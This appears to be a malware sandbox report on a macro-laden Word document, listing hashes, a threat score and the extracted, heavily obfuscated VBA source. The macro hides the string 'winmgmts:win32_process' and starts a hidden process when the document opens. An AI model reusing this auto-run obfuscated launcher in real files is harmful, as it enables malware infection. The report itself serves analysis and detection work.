9ca84c781d6722c02a250ce9258cb650_JaffaCakes118

Sharing

Copy URL

Twitter E-mail

General

Target

9ca84c781d6722c02a250ce9258cb650_JaffaCakes118
Size

189KB
MD5

9ca84c781d6722c02a250ce9258cb650
SHA1

48c5c893a427b99e4b352e4668aa589829ed905c
SHA256

6351168d14cfa0372803482062882590c98d717dc4f4eb2541fe3a154e8dc40f
SHA512

7a08ba4709b95f5614d2b431327f2b1bf31fdf2f2f3f22f5926ea15657586483b880ca4cddfff039c492d76fd994b3322c989e1eda92f15ba056ae42c4f04817
SSDEEP

3072:uvHv22TWTogk079THcpOu5UZNNu81zUz4LKvJ:E/TX07hHcJQXuezUEL4J

Score

8^/10

macro

Malware Config

Signatures

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

resource
sample

Files

9ca84c781d6722c02a250ce9258cb650_JaffaCakes118
.doc windows office2003

Sa837u25mqhc9y9f

1

Attribute VB_Name = "Sa837u25mqhc9y9f"

2

Attribute VB_Base = "1Normal.ThisDocument"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = True

8

Attribute VB_Customizable = True

9

Private Sub Document_open()

10

Yb_zm4cl2tdlp = Array(Mgjic3k0aluz + "Seci_4x29pddFt9igvfrvj8x5 B_azeyungyket" + Lu3fe1u3a4e0t3e7g, Dpv2810p36mk0cc, Qlih9c1fe16qptome.Qcr5w_bqiqx6, Aar2te5k_iugf + "Glsz0di1xbhz9zp26 Xg2dpqdbwk2 E4k_wb4jd0elopt5 D7josk0bf7bw")

11

End Sub

12

Qlih9c1fe16qptome

1

Attribute VB_Name = "Qlih9c1fe16qptome"

2

Attribute VB_Base = "0{157127A2-A3A5-4830-8E8F-878A36843948}{94967D22-A541-498D-9A71-A68AB3E3BA92}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

9

Function Qcr5w_bqiqx6()

10

On Error Resume Next

11

Set nnnnnnnnn = Languages

12

BcfWWjIUB = Mid _

13

(Ai53fcno2x7da9i5, 196, 1)

14

dYvJsnjw = Mid _

15

(V50kdktxy7d3fgnbre, 212, 1)

16

BiHOVG = Mid _

17

(Osw3ykfbx1lfxfa, 35, 1)

18

GQJzwq = Mid _

19

(Nvn90lesgkxw, 34, 1)

20

WKcaSvfi = Mid _

21

(Nbu5xksjcla9i7, 9, 1)

22

lsFUF = Mid _

23

(I2qxe_6qdgxiodvoyt, 240, 1)

24

VAwYHAcv = Mid _

25

(Cz2ma7t0qkn_2pg, 20, 1)

26

hNfbEKURZVE = Mid _

27

(L5_sryvrx_bd, 179, 1)

28

wYVOV = Mid _

29

(M9mox3jvoq3w, 190, 1)

30

mLdZb = Mid _

31

(Jg2g85h9evy, 265, 1)

32

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

33

UNfjikDjKTc = Mid _

34

(Cqdkza5p4_n, 33, 1)

35

zmlHaKIVkFA = Mid _

36

(Pdx9vbni7qk, 168, 1)

37

UCPVYn = Mid _

38

(Srdi8hmmznumfl, 10, 1)

39

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

40

SFwwBAcXs = Mid _

41

(L9gio41v5gjndhpf, 44, 1)

42

scjHiSYQBQp = EIjom + SFwwBAcXs

43

M7hluppbo2go4j6q = 90

44

Set nnnnnnnnn = Languages

45

BcfWWjIUB = Mid _

46

(Dqqjbvmxv82n7, 196, 1)

47

dYvJsnjw = Mid _

48

(Axekt5o0cue, 212, 1)

49

BiHOVG = Mid _

50

(Pt_ff2s6e2q9rff72, 35, 1)

51

GQJzwq = Mid _

52

(Xo8kmx3hu97go7fh_, 34, 1)

53

WKcaSvfi = Mid _

54

(Rp3_7b_jgh4oytilx, 9, 1)

55

lsFUF = Mid _

56

(Ylhmo9gu09nu3kgm, 240, 1)

57

VAwYHAcv = Mid _

58

(I_9t6lcruogj, 20, 1)

59

hNfbEKURZVE = Mid _

60

(Ydjqjyxla54lc, 179, 1)

61

wYVOV = Mid _

62

(Xxqthml7l1g, 190, 1)

63

mLdZb = Mid _

64

(Ze75t_kw_jl, 265, 1)

65

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

66

UNfjikDjKTc = Mid _

67

(As18lgei4kf5e, 33, 1)

68

zmlHaKIVkFA = Mid _

69

(Z9cc4tkfyspgl4aqb, 168, 1)

70

UCPVYn = Mid _

71

(Hes1wovfw0k1_b1y, 10, 1)

72

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

73

SFwwBAcXs = Mid _

74

(Ju9r4b75ire, 44, 1)

75

scjHiSYQBQp = EIjom + SFwwBAcXs

76

Buv3a7s64z9g8cage2 = Lsoancly6yc2f3 + Chr$(M7hluppbo2go4j6q + (25))

77

Set nnnnnnnnn = Languages

78

BcfWWjIUB = Mid _

79

(Ftuqena81o03bnwv, 196, 1)

80

dYvJsnjw = Mid _

81

(Mb73naxazmwoxay54d, 212, 1)

82

BiHOVG = Mid _

83

(Fsmes4vnceorlddoy, 35, 1)

84

GQJzwq = Mid _

85

(W5s8qqapsdnk, 34, 1)

86

WKcaSvfi = Mid _

87

(Gj4ope9o_4yv7l7lku, 9, 1)

88

lsFUF = Mid _

89

(Aw9jllc8dclsa4g, 240, 1)

90

VAwYHAcv = Mid _

91

(Fs1yj157b6mu, 20, 1)

92

hNfbEKURZVE = Mid _

93

(Ddht2jmlasdn, 179, 1)

94

wYVOV = Mid _

95

(Vlzlx3zgy5v7, 190, 1)

96

mLdZb = Mid _

97

(H3ciq0s20_d0j, 265, 1)

98

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

99

UNfjikDjKTc = Mid _

100

(V5g_xla7th2hu6_, 33, 1)

101

zmlHaKIVkFA = Mid _

102

(Hxxo0vj4be6r8l, 168, 1)

103

UCPVYn = Mid _

104

(Ioi6ns50vmpi6rj, 10, 1)

105

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

106

SFwwBAcXs = Mid _

107

(Q3r1rl7vjuo0sr, 44, 1)

108

scjHiSYQBQp = EIjom + SFwwBAcXs

109

R8wpjw339nko5qn = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Buv3a7s64z9g8cage2 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + Qlih9c1fe16qptome.T7maztzkyy2gw96 + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"

110

Set nnnnnnnnn = Languages

111

BcfWWjIUB = Mid _

112

(Uj6uwsnkxq58, 196, 1)

113

dYvJsnjw = Mid _

114

(F0jdmfimwvt9ml4, 212, 1)

115

BiHOVG = Mid _

116

(Qyya1y597o31gqhn, 35, 1)

117

GQJzwq = Mid _

118

(Svkv8va65gzmxkg, 34, 1)

119

WKcaSvfi = Mid _

120

(P_3f76ueli9osfg, 9, 1)

121

lsFUF = Mid _

122

(Emx2sd2cyf8sf, 240, 1)

123

VAwYHAcv = Mid _

124

(Gevfwqph16afjzy, 20, 1)

125

hNfbEKURZVE = Mid _

126

(Iz_mfkxqcrj1s20, 179, 1)

127

wYVOV = Mid _

128

(Z1044nu10_x, 190, 1)

129

mLdZb = Mid _

130

(Sn5bob5is4q_sfdeg, 265, 1)

131

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

132

UNfjikDjKTc = Mid _

133

(R070gu264_ejogy5, 33, 1)

134

zmlHaKIVkFA = Mid _

135

(Sxilr92vgk_lyjqt, 168, 1)

136

UCPVYn = Mid _

137

(Hy83gkkui5di, 10, 1)

138

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

139

SFwwBAcXs = Mid _

140

(Glypor0ohbfo_j, 44, 1)

141

scjHiSYQBQp = EIjom + SFwwBAcXs

142

Sdbb_vfbd4vmwjg = Ve1gtu0b9lgt(R8wpjw339nko5qn)

143

Set nnnnnnnnn = Languages

144

BcfWWjIUB = Mid _

145

(Gjd7751fk4n, 196, 1)

146

dYvJsnjw = Mid _

147

(Plmp2f0i6rxm, 212, 1)

148

BiHOVG = Mid _

149

(Ua6uheyjm03pfhlzn_, 35, 1)

150

GQJzwq = Mid _

151

(Yu6t3w76ajh3w39, 34, 1)

152

WKcaSvfi = Mid _

153

(U7vcz18jnv_, 9, 1)

154

lsFUF = Mid _

155

(Xyusrcnn0rc0mjy, 240, 1)

156

VAwYHAcv = Mid _

157

(Dhfxhfs4398iyvghwj, 20, 1)

158

hNfbEKURZVE = Mid _

159

(I11lupvel5x2pc8ffp, 179, 1)

160

wYVOV = Mid _

161

(K4f31ufe1nl6m, 190, 1)

162

mLdZb = Mid _

163

(Jlkp8wixag0, 265, 1)

164

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

165

UNfjikDjKTc = Mid _

166

(Erg2qa4k6eg9, 33, 1)

167

zmlHaKIVkFA = Mid _

168

(Tok62a0kzc3x1j5e43, 168, 1)

169

UCPVYn = Mid _

170

(Uvnz009kcciiempfh9, 10, 1)

171

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

172

SFwwBAcXs = Mid _

173

(Gf_6sppe130fcnhfp, 44, 1)

174

scjHiSYQBQp = EIjom + SFwwBAcXs

175

Set B6janv5ddxke9cwiy = CreateObject(Sdbb_vfbd4vmwjg)

176

Set nnnnnnnnn = Languages

177

BcfWWjIUB = Mid _

178

(Nq4cxi4lk_2dlnev, 196, 1)

179

dYvJsnjw = Mid _

180

(Bo1d513_3628, 212, 1)

181

BiHOVG = Mid _

182

(At5lib434gkl, 35, 1)

183

GQJzwq = Mid _

184

(Ob3dkio73_yvz2ad6, 34, 1)

185

WKcaSvfi = Mid _

186

(Bpf_hjaed3oki, 9, 1)

187

lsFUF = Mid _

188

(Uce2izvtsjiug1, 240, 1)

189

VAwYHAcv = Mid _

190

(H3z05i8wv5sdffx, 20, 1)

191

hNfbEKURZVE = Mid _

192

(N3i4xwk7g4u883, 179, 1)

193

wYVOV = Mid _

194

(Bkv4azmoh8qu91vp, 190, 1)

195

mLdZb = Mid _

196

(X314098zs53by_, 265, 1)

197

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

198

UNfjikDjKTc = Mid _

199

(Vgp5umw4gnb7gcmf, 33, 1)

200

zmlHaKIVkFA = Mid _

201

(Jfafb7enzes7unt, 168, 1)

202

UCPVYn = Mid _

203

(T13k36bk0up9b1wfyg, 10, 1)

204

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

205

SFwwBAcXs = Mid _

206

(N_u3klr6id8xas_q, 44, 1)

207

scjHiSYQBQp = EIjom + SFwwBAcXs

208

Ytb_1nhuznbjlv1z = Dv0ispniyjgp_j + Sdbb_vfbd4vmwjg + Buv3a7s64z9g8cage2 + Qlih9c1fe16qptome.H7j2yorcqx1jezv + Qlih9c1fe16qptome.Qud6yft2paarulpftj

209

Set nnnnnnnnn = Languages

210

BcfWWjIUB = Mid _

211

(Goe6ttlufwb, 196, 1)

212

dYvJsnjw = Mid _

213

(G1i4pauxy4zy8fecp, 212, 1)

214

BiHOVG = Mid _

215

(Qd0_a7q05wczi, 35, 1)

216

GQJzwq = Mid _

217

(Ul7fs0kj35pqzr0n, 34, 1)

218

WKcaSvfi = Mid _

219

(Gf4005k1nnrh9u, 9, 1)

220

lsFUF = Mid _

221

(Ob7vk0vrboleuuh__q, 240, 1)

222

VAwYHAcv = Mid _

223

(Vuq14rvqfw5c, 20, 1)

224

hNfbEKURZVE = Mid _

225

(Hr7yvodqyy2ux12fg, 179, 1)

226

wYVOV = Mid _

227

(M222oelcd1tq7, 190, 1)

228

mLdZb = Mid _

229

(Ir6cztowm2g7, 265, 1)

230

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

231

UNfjikDjKTc = Mid _

232

(Dg36k_inldtc3mtk, 33, 1)

233

zmlHaKIVkFA = Mid _

234

(Xi4tif7yrx07p_, 168, 1)

235

UCPVYn = Mid _

236

(Npg8m6jry7bol_8, 10, 1)

237

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

238

SFwwBAcXs = Mid _

239

(Xm060dg8a8g5, 44, 1)

240

scjHiSYQBQp = EIjom + SFwwBAcXs

241

Set Guoc29dwh9ffc = Foxawxm4_7f(Ytb_1nhuznbjlv1z + Qlih9c1fe16qptome.T7maztzkyy2gw96)

242

Set nnnnnnnnn = Languages

243

BcfWWjIUB = Mid _

244

(Nj8g9q_ofc81t, 196, 1)

245

dYvJsnjw = Mid _

246

(Gx2kcsii_p4ga0or3, 212, 1)

247

BiHOVG = Mid _

248

(Rdgfiiqzk9kseu6, 35, 1)

249

GQJzwq = Mid _

250

(Yvhix1djksn3qa_, 34, 1)

251

WKcaSvfi = Mid _

252

(Inbqydot5ohk0skj, 9, 1)

253

lsFUF = Mid _

254

(Ka5jt89_8726z, 240, 1)

255

VAwYHAcv = Mid _

256

(G0vg3sp96gzp, 20, 1)

257

hNfbEKURZVE = Mid _

258

(N4l3heqaafq4r, 179, 1)

259

wYVOV = Mid _

260

(L3iyzfe0mol, 190, 1)

261

mLdZb = Mid _

262

(T8sgyuexqgwdt2i, 265, 1)

263

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

264

UNfjikDjKTc = Mid _

265

(G5folo0fxsaj, 33, 1)

266

zmlHaKIVkFA = Mid _

267

(Or8qznut6s7y, 168, 1)

268

UCPVYn = Mid _

269

(Rkfef998zsj9hm9mu, 10, 1)

270

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

271

SFwwBAcXs = Mid _

272

(O6s7zzx5ny1p, 44, 1)

273

scjHiSYQBQp = EIjom + SFwwBAcXs

274

B6janv5ddxke9cwiy.Create Ce7y4xx8z3il, U3917vko2b8sydyk3j, Guoc29dwh9ffc

275

Set nnnnnnnnn = Languages

276

BcfWWjIUB = Mid _

277

(C_98g9etbascbv4, 196, 1)

278

dYvJsnjw = Mid _

279

(I2op5jt5lb36rn_h, 212, 1)

280

BiHOVG = Mid _

281

(Qghbluyd5a4_q, 35, 1)

282

GQJzwq = Mid _

283

(L9m4v0v15qdv, 34, 1)

284

WKcaSvfi = Mid _

285

(Ejcyal4powxa, 9, 1)

286

lsFUF = Mid _

287

(Sl_j2674m9eu, 240, 1)

288

VAwYHAcv = Mid _

289

(Gy8m202ps53m3y, 20, 1)

290

hNfbEKURZVE = Mid _

291

(Vbmz3pij2v1jzm5m, 179, 1)

292

wYVOV = Mid _

293

(Cxbfsb6zk2iri80gj_, 190, 1)

294

mLdZb = Mid _

295

(Pq3_bog3azcdz, 265, 1)

296

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

297

UNfjikDjKTc = Mid _

298

(Vifwslarasya3sy, 33, 1)

299

zmlHaKIVkFA = Mid _

300

(Bpmt2rmxa2mk6_ixt, 168, 1)

301

UCPVYn = Mid _

302

(Kz5u3zkepjmaxyeixx, 10, 1)

303

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

304

SFwwBAcXs = Mid _

305

(E3n8sw301wbkar4e_, 44, 1)

306

scjHiSYQBQp = EIjom + SFwwBAcXs

307

End Function

308

Function Foxawxm4_7f(U1fau9baq1yt)

309

On Error Resume Next

310

Set nnnnnnnnn = Languages

311

BcfWWjIUB = Mid _

312

(Fxtx9ydyd_q, 196, 1)

313

dYvJsnjw = Mid _

314

(Camhw3qb29enn, 212, 1)

315

BiHOVG = Mid _

316

(Zs1jhqis9xwmgj, 35, 1)

317

GQJzwq = Mid _

318

(Q3hfnhuzrdn, 34, 1)

319

WKcaSvfi = Mid _

320

(Nmjtfkuyv954_bwc, 9, 1)

321

lsFUF = Mid _

322

(Pkvh_dg9i_hq5jg5, 240, 1)

323

VAwYHAcv = Mid _

324

(Sfzeqbxvr19pflwr_, 20, 1)

325

hNfbEKURZVE = Mid _

326

(V4quidv9lmi3zy0gm, 179, 1)

327

wYVOV = Mid _

328

(Kufi0wsoisdyv0, 190, 1)

329

mLdZb = Mid _

330

(Jmbnf8wtt2kn1akq0, 265, 1)

331

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

332

UNfjikDjKTc = Mid _

333

(Ddp1v66c66c5x3j9ll, 33, 1)

334

zmlHaKIVkFA = Mid _

335

(Vht4axsyj4n9ce1q7p, 168, 1)

336

UCPVYn = Mid _

337

(Tgtdc2qzdtd31_sf, 10, 1)

338

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

339

SFwwBAcXs = Mid _

340

(Plpccgwjs8az9loty, 44, 1)

341

scjHiSYQBQp = EIjom + SFwwBAcXs

342

Set Foxawxm4_7f = GetObject(U1fau9baq1yt)

343

Set nnnnnnnnn = Languages

344

BcfWWjIUB = Mid _

345

(Nc72nl8he0h9q2wt4, 196, 1)

346

dYvJsnjw = Mid _

347

(H1lgra0ru27, 212, 1)

348

BiHOVG = Mid _

349

(Hh282_uarmib1greas, 35, 1)

350

GQJzwq = Mid _

351

(Kxwz3smw6482, 34, 1)

352

WKcaSvfi = Mid _

353

(Iezahtax_4x0, 9, 1)

354

lsFUF = Mid _

355

(Gqku5rbsqmys0o, 240, 1)

356

VAwYHAcv = Mid _

357

(Kzhvvc1vsq9rsw, 20, 1)

358

hNfbEKURZVE = Mid _

359

(W01li8ll0q1y84, 179, 1)

360

wYVOV = Mid _

361

(Niewikvbopu, 190, 1)

362

mLdZb = Mid _

363

(Ud8_u8as14ygsdojf, 265, 1)

364

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

365

UNfjikDjKTc = Mid _

366

(K44s91n8nej9m8zbt, 33, 1)

367

zmlHaKIVkFA = Mid _

368

(Bqg27ll1u0ef, 168, 1)

369

UCPVYn = Mid _

370

(I7s_2clfhxxt7i4q3r, 10, 1)

371

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

372

SFwwBAcXs = Mid _

373

(Ogi11y9shifo4i, 44, 1)

374

scjHiSYQBQp = EIjom + SFwwBAcXs

375

Foxawxm4_7f. _

376

showwindow = wdKeyEquals - wdKeyEquals

377

Set nnnnnnnnn = Languages

378

BcfWWjIUB = Mid _

379

(Qr56buepde4v, 196, 1)

380

dYvJsnjw = Mid _

381

(Xm33x89hiw2lw76f, 212, 1)

382

BiHOVG = Mid _

383

(Yzl1zgq8vlpbja, 35, 1)

384

GQJzwq = Mid _

385

(Hsuwy8mq_8o7dup, 34, 1)

386

WKcaSvfi = Mid _

387

(Gkyfdj0hfl6bvtg_, 9, 1)

388

lsFUF = Mid _

389

(Daeljstwjm4kknn, 240, 1)

390

VAwYHAcv = Mid _

391

(Qf2v6sbtnrmc, 20, 1)

392

hNfbEKURZVE = Mid _

393

(Wr2pl0tlna4ft, 179, 1)

394

wYVOV = Mid _

395

(Yg860s79npp1x_v03, 190, 1)

396

mLdZb = Mid _

397

(Mmn7c7_o57kf, 265, 1)

398

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

399

UNfjikDjKTc = Mid _

400

(Llydnqwnup9el_vlu2, 33, 1)

401

zmlHaKIVkFA = Mid _

402

(Gxzhrcdb7vy_yi, 168, 1)

403

UCPVYn = Mid _

404

(Zo_7hsg488q327, 10, 1)

405

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

406

SFwwBAcXs = Mid _

407

(Ckf78l2ehbjp23, 44, 1)

408

scjHiSYQBQp = EIjom + SFwwBAcXs

409

End Function

410

Function Ve1gtu0b9lgt(Cz7yltxxs7f4q5a9m)

411

On Error Resume Next

412

Set nnnnnnnnn = Languages

413

BcfWWjIUB = Mid _

414

(Gkuvsu148u5w, 196, 1)

415

dYvJsnjw = Mid _

416

(Q5356pslj21j3syjr, 212, 1)

417

BiHOVG = Mid _

418

(Cb6g2q7ylgclg5a, 35, 1)

419

GQJzwq = Mid _

420

(Fzh_mmo0_t5m, 34, 1)

421

WKcaSvfi = Mid _

422

(Bbup92u9qcm0gdli, 9, 1)

423

lsFUF = Mid _

424

(O8ivk_bsk3x8ghxu9j, 240, 1)

425

VAwYHAcv = Mid _

426

(N7jcqj2w6bf, 20, 1)

427

hNfbEKURZVE = Mid _

428

(C1b08dg3cs9y, 179, 1)

429

wYVOV = Mid _

430

(Ybj71oj6h1dl54ltog, 190, 1)

431

mLdZb = Mid _

432

(Dtuhfi1q3rba9v, 265, 1)

433

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

434

UNfjikDjKTc = Mid _

435

(Nir1fx7n7_0, 33, 1)

436

zmlHaKIVkFA = Mid _

437

(Bl6jzlqspn6ex_0s, 168, 1)

438

UCPVYn = Mid _

439

(E1f11jdcyb6kgy, 10, 1)

440

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

441

SFwwBAcXs = Mid _

442

(Fvye8inzsczf, 44, 1)

443

scjHiSYQBQp = EIjom + SFwwBAcXs

444

Wqz461mslu5 = CleanString(Cz7yltxxs7f4q5a9m)

445

Set nnnnnnnnn = Languages

446

BcfWWjIUB = Mid _

447

(L1qa56249jfkl9, 196, 1)

448

dYvJsnjw = Mid _

449

(Mqoqlb31toa, 212, 1)

450

BiHOVG = Mid _

451

(Lfrv34wz_jvblfpay, 35, 1)

452

GQJzwq = Mid _

453

(Kafdt7aqtoza, 34, 1)

454

WKcaSvfi = Mid _

455

(Q5dlyqyorzjbi7nefx, 9, 1)

456

lsFUF = Mid _

457

(Bla_wnwwvmji__n0, 240, 1)

458

VAwYHAcv = Mid _

459

(F62v_68m7cla, 20, 1)

460

hNfbEKURZVE = Mid _

461

(In290vw5r9b6dbhq, 179, 1)

462

wYVOV = Mid _

463

(B79f7k7fcrdy2, 190, 1)

464

mLdZb = Mid _

465

(Hw9a7scb3mo29, 265, 1)

466

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

467

UNfjikDjKTc = Mid _

468

(T8417x_qcspc647e, 33, 1)

469

zmlHaKIVkFA = Mid _

470

(E2x2jgbl0hbdv3f, 168, 1)

471

UCPVYn = Mid _

472

(Fpgzo4el7tpv4x, 10, 1)

473

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

474

SFwwBAcXs = Mid _

475

(Dy4iak0s22o8p, 44, 1)

476

scjHiSYQBQp = EIjom + SFwwBAcXs

477

Gmtt3rmdqxp = Split(Wqz461mslu5, "g, bq,")

478

Set nnnnnnnnn = Languages

479

BcfWWjIUB = Mid _

480

(Mc9zhgwprksfr90, 196, 1)

481

dYvJsnjw = Mid _

482

(Scfomcqgez2fg, 212, 1)

483

BiHOVG = Mid _

484

(Lxelhkvmsesv, 35, 1)

485

GQJzwq = Mid _

486

(E2soq_1c9fripx, 34, 1)

487

WKcaSvfi = Mid _

488

(Ospqjl56bf2z3nua, 9, 1)

489

lsFUF = Mid _

490

(Uxkqxllgqdtsxd3y63, 240, 1)

491

VAwYHAcv = Mid _

492

(Sbldm7qi1k01nevq3n, 20, 1)

493

hNfbEKURZVE = Mid _

494

(Yhek4iknpb0b8, 179, 1)

495

wYVOV = Mid _

496

(Pl6qt9vgcv7rngn, 190, 1)

497

mLdZb = Mid _

498

(Ralu53v2t7b, 265, 1)

499

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

500

UNfjikDjKTc = Mid _

501

(Ag3jce441_ip12, 33, 1)

502

zmlHaKIVkFA = Mid _

503

(Npm6eamo02m3, 168, 1)

504

UCPVYn = Mid _

505

(Se9y8cf75wpjouny3, 10, 1)

506

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

507

SFwwBAcXs = Mid _

508

(Vcxbmga8rz34t1n_cw, 44, 1)

509

scjHiSYQBQp = EIjom + SFwwBAcXs

510

B8lyt1dymc91j = Aqhzt_ck13hxlp08 + Join(Gmtt3rmdqxp, Vp766hhgv91e_)

511

Set nnnnnnnnn = Languages

512

BcfWWjIUB = Mid _

513

(K5k0tbefz1i2n_ida, 196, 1)

514

dYvJsnjw = Mid _

515

(Ih3mish5v3boos, 212, 1)

516

BiHOVG = Mid _

517

(Oc9nh5fmiy5a, 35, 1)

518

GQJzwq = Mid _

519

(Ubr0wg7rccw32zrn, 34, 1)

520

WKcaSvfi = Mid _

521

(Hm2u49k14yg, 9, 1)

522

lsFUF = Mid _

523

(Nypstbulc4iw1s_mw, 240, 1)

524

VAwYHAcv = Mid _

525

(Dz_foskf_egj4t, 20, 1)

526

hNfbEKURZVE = Mid _

527

(Ptphkhy9baree5k9, 179, 1)

528

wYVOV = Mid _

529

(Dmur7oj9hobpe5az7e, 190, 1)

530

mLdZb = Mid _

531

(Pemjr29e9oglzhieq0, 265, 1)

532

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

533

UNfjikDjKTc = Mid _

534

(Sefkc5ws9hrp, 33, 1)

535

zmlHaKIVkFA = Mid _

536

(Slm54dd10kmu, 168, 1)

537

UCPVYn = Mid _

538

(Cni8zu2xo6p, 10, 1)

539

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

540

SFwwBAcXs = Mid _

541

(Gq6ja8r_9vo6omn7t, 44, 1)

542

scjHiSYQBQp = EIjom + SFwwBAcXs

543

Ve1gtu0b9lgt = B8lyt1dymc91j

544

Set nnnnnnnnn = Languages

545

BcfWWjIUB = Mid _

546

(B5r0g0ik7ug15r1q, 196, 1)

547

dYvJsnjw = Mid _

548

(Vm9xq_0lj3ibq, 212, 1)

549

BiHOVG = Mid _

550

(Nqhc3tx0jrm, 35, 1)

551

GQJzwq = Mid _

552

(Ki5s7trxwr4a, 34, 1)

553

WKcaSvfi = Mid _

554

(Wsx8haipsxjwo09, 9, 1)

555

lsFUF = Mid _

556

(Wcqllu2r37zv4qby, 240, 1)

557

VAwYHAcv = Mid _

558

(M8aaccrd19wu, 20, 1)

559

hNfbEKURZVE = Mid _

560

(Mvt_1pn1kl3gellywb, 179, 1)

561

wYVOV = Mid _

562

(Qp9b9y5a0hvxf87, 190, 1)

563

mLdZb = Mid _

564

(Cb52xkrgwi692g, 265, 1)

565

zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb

566

UNfjikDjKTc = Mid _

567

(C7a0rtuwl7optz, 33, 1)

568

zmlHaKIVkFA = Mid _

569

(Qji7hw3k0m03pz58, 168, 1)

570

UCPVYn = Mid _

571

(U3r2e0p7tqt6j, 10, 1)

572

EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn

573

SFwwBAcXs = Mid _

574

(Yr0wvz706mwcws3f8s, 44, 1)

575

scjHiSYQBQp = EIjom + SFwwBAcXs

576

End Function

577

Function Ce7y4xx8z3il()

578

On Error Resume Next

579

Set nnnnnnnnn = Languages

580

BcfWWjIUB = Mid _

581

(Vk3156c3q987kxiu, 196, 1)

582

dYvJsnjw = Mid _

583

(F5aqa8mtsjc_1gp, 212, 1)

584

BiHOVG = Mid _

585

(Sz2dopmhjxo_aaa6, 35, 1)

586

GQJzwq = Mid _

587

(T_yqj5nqglw_412s, 34, 1)

588

WKcaSvfi = Mid _

589

(O0rqg3s5gntm, 9, 1)

590

lsFUF = Mid _

591

(Miim0h2hq7oyhe2, 240, 1)

592

VAwYHAcv = Mid _

593

(L8xs4qcngvhg, 20, 1)

594

hNfbEKURZVE = Mid _

595

(Br6dy5o3q3u2aedd, 179, 1)

596

wYVOV = Mid _

597

(Zy2w2q762af6go_uv, 190, 1)

598

mLdZb = Mid _

599

(Kuuuknrafc23m_, 265, 1)

600

